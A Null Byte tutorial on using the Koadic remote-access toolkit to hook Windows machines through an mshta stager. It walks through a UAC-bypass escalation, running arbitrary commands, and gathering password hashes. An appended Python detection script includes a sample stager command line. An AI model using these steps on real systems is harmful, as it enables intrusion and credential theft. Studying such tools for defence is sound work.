
How to Use the Koadic Command & Control Remote Access Toolkit for Windows Post-Exploitation « Null Byte :: WonderHowTo

Koadic allows hackers to monitor and control exploited Windows systems remotely. The tool facilitates remote access to Windows devices via the Windows Script Host, and works with practically every version of Windows. Koadic is capable of sitting entirely in memory to evade detection and is able to cryptographically secure its own web command-and-control communications.

The Koadic post-exploitation toolkit serves as an alternative to tools like Meterpreter and PowerShell Empire. While there is some difference in the way payloads are delivered, and by which exploits, Koadic provides a fully featured environment to remotely perform tasks on an exploited Windows system. The tool provides two main categories of functions, divided within the program into stagers and implants.


Stagers are used to create the actual remote-access connections through different Windows-based processes, and implants are used to complete tasks on systems that are already connected as zombie machines over the stager connection. These implants can execute commands, retrieve system keys and password hashes, and even play audio on the zombie device.

To begin using Koadic, it first needs to be downloaded and installed. In this example, Koadic is installed on a Linux system; however, it will potentially run on any system that has a Unix-like shell environment.

Step 1: Downloading & Installing Koadic

Koadic is available from zerosum0x0’s GitHub page. On systems with Git already installed, the source code can be downloaded by running the command below in a terminal window.

git clone https://github.com/zerosum0x0/koadic

Once the source code is downloaded, we can run cd koadic/ to move into the new Koadic directory. Once in the Koadic folder, we can use Pip to install the Python requirements. These requirements are listed in the “requirements.txt” file in the Koadic directory, so we’ll pass this file as an argument to Pip, as shown in the command below.

pip install -r requirements.txt

Once the requirements are installed, Koadic can be run by simply entering ./koadic from within the program directory.

If the program loads an interface similar to the one above, Koadic is ready to use!

Step 2: Preparing Koadic

The most useful command for gaining an overview of Koadic usage is help.

The help command provides an overview of the different commands available. Koadic functions similarly to other frameworks you may be familiar with, such as Metasploit, and as such it allows individual modules to be loaded and configured. Once a module is selected, parameters can be set, and then the module can be run. Koadic also provides autocomplete, triggered by pressing Tab, which makes it a little easier to search for and find commands.

Let’s begin by loading the mshta stager by running the command below.

use stager/js/mshta

The stager allows us to define where the Koadic command and control is accessed by any “zombie” devices. We can view the available settings by running info once the stager is selected.

The stager allows us to define the IP, port, and expiry date of the command and control, as well as keys and certificates if desired. The default port of “9999” should be fine for our test environment; however, you should confirm that the “SRVHOST” IP value corresponds to your IP on your local network, or to the VPS or server that Koadic is running on. To set it manually, run the command below, where IP is the desired IP address for the staging server.


Once the staging server is configured, it’s ready to be started. Launch the stager by typing run on the Koadic command line and pressing Enter.

Step 3: Connecting a Zombie PC to the C&C

A Windows PC can be connected to the Koadic “mshta” staging server by running just one line at the command prompt. This command, similar to the one shown below, begins with mshta followed by the IP and port of the staging server. The command can also be retrieved from the Koadic command log itself, as it is shown after running the stager.


Once this command is run, the Windows device will be connected as a zombie to the command and control. In a real-world attack, the command would generally be executed by another program, a USB Rubber Ducky, or through an application exploit, rather than simply being run by the user at the command prompt.

After the command is run, we can confirm that the zombie is connected by running zombies within Koadic.

The first zombie connected will be assigned the ID 0. To view more information on this zombie, we can run the command below.

zombies 0

This device is already hooked, although not yet elevated. Next, we’ll look at gaining additional user privileges on the zombie machine.

Step 4: Privilege Escalation

To test privilege escalation against the Windows machine, we’ll use the “Bypass User Account Control” implant. We can load it by running the command below within Koadic.

use implant/elevate/bypassuac_eventvwr

Next, we’ll set the payload value so that the implant can run. We can leave the value of “ZOMBIE” as “ALL” to attack all zombies, or set it to the specific zombie one wishes to attack. To adjust the payload value, run the command shown below.


After the payload is set, we can launch the UAC bypass attempt by simply executing run from the Koadic command line.

Once the task is complete, we can check whether the privilege escalation attack was successful by checking the zombie information, as was done prior to the attempt. To check the status of the first zombie device, run zombies 0 on the Koadic command line.

When the “Elevated” status shows “YES!”, the Windows device is now hooked and privilege escalation is complete.

Step 5: Post-Exploitation with Koadic

Once we have an exploited device with elevated privileges, there are several rootkit functions we can perform from the Koadic command and control. The “implant” modules, as shown in the image below, give an overview of some of the functions that can be performed with Koadic.

The “exec_cmd” implant allows one to run any command on the Windows system. To load this implant, run the command below.

use implant/manage/exec_cmd

To set the desired command, we can use the set command, as done previously when changing settings for other modules. To set the command to be run to dir, which will return a list of files and directories, run the following command.

set CMD dir

To confirm these settings were changed, run info to view the module information.

If the implant settings are as desired, simply type run and press Enter to run the module.

The possibility of shell access, as in the example above, shows how much control can be given to an attacker with just one command being run on a Windows system. Other implants, such as the “gathering” tools shown in the image below, attempt to capture important information such as user account details and password hashes and send them to the command-and-control server.

Koadic also provides several “fun” implants. The “voice” implant uses Windows’ integrated text-to-speech tools to “speak” a message on the zombie computer. To use this implant, first run use implant/fun/voice. The message can be set with set MESSAGE followed by the desired message to be spoken. The specific zombies can be set in the same way as in the previous modules, or the value can be left at the default of “ALL” to run on all zombies. To run the implant, simply type run and press Enter.

While these attacks have mixed success, the majority of the rootkit implants are very effective, even on modern versions of Windows. The limited likelihood of detection and the potential for automation using Python establish Koadic as a potent remote-access toolkit capable of carrying out complicated attacks.


Protecting Against RATs

Protecting a Windows device against remote-access toolkits is similar to preventing any other sort of malware attack. Users should always keep their systems updated to prevent malware being delivered through unpatched system vulnerabilities. Access to a PC should always be limited, as an attack can be carried out in a matter of seconds with physical access, as shown by the single string that granted remote access in this tutorial. Lastly, it’s always best to use an antivirus and to only run trusted executable files on a Windows system.
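As a defensive counterpart to the single-line mshta stager described above, here is an added example (not part of the original article and not Koadic’s own code) of a small Python triage script that scans process-creation records for the patterns a detection engineer would watch for: mshta.exe launched with a remote http(s) URL, especially a bare IP and port like the staging server in this tutorial, and any process spawned by mshta.exe. The pipe-separated log format and the sample events are constructed for this example, and the idea that implant commands show up as child processes of mshta.exe is an assumption of mine, not something the article states.

```python
import re

# Constructed sample process-creation events (Sysmon-style, simplified to
# image|parent_image|command_line). Not real telemetry; all values invented.
SAMPLE_EVENTS = [
    "C:\\Windows\\System32\\mshta.exe|C:\\Windows\\System32\\cmd.exe|mshta http://192.0.2.10:9999/abc",
    "C:\\Windows\\System32\\mshta.exe|C:\\Windows\\explorer.exe|mshta C:\\Users\\alice\\Desktop\\report.hta",
    "C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\mshta.exe|cmd.exe /c dir",
    "C:\\Windows\\System32\\notepad.exe|C:\\Windows\\explorer.exe|notepad.exe notes.txt",
]

# Any http(s) URL on the command line; a local .hta path will not match.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# A bare IPv4 address with an explicit port, as in "mshta http://IP:9999/...".
IP_PORT_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3}):(\d+)", re.IGNORECASE)


def parse_event(line):
    """Split one constructed log line into its three fields."""
    image, parent, cmdline = line.split("|", 2)
    return {"image": image, "parent": parent, "cmdline": cmdline}


def basename(path):
    """Lower-cased file name of a Windows path, for comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of the rules that fire for one event (may be empty)."""
    hits = []
    if basename(event["image"]) == "mshta.exe":
        if URL_RE.search(event["cmdline"]):
            hits.append("mshta_remote_url")      # script host fetching remote content
        if IP_PORT_RE.search(event["cmdline"]):
            hits.append("mshta_ip_port_url")     # raw IP:port, typical of a staging server
    # Assumption: post-exploitation commands appear as children of mshta.exe.
    if basename(event["parent"]) == "mshta.exe":
        hits.append("mshta_child_process")
    return hits


def scan(lines):
    """Run every rule over every line; return (rule, command_line) pairs."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        for rule in classify(ev):
            alerts.append((rule, ev["cmdline"]))
    return alerts


if __name__ == "__main__":
    for rule, cmdline in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {cmdline}")
```

A normal user opening a local .hta file (the second sample event) raises no alert, so the rules key on the remote fetch and the child processes rather than on mshta.exe alone.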

I hope that you enjoyed this tutorial on Koadic! If you have any questions about this tutorial or Koadic in general, feel free to leave a comment or reach me on Twitter @tahkion.

Cover image and screenshots by TAKHION/Null Byte (cover background via NASA)
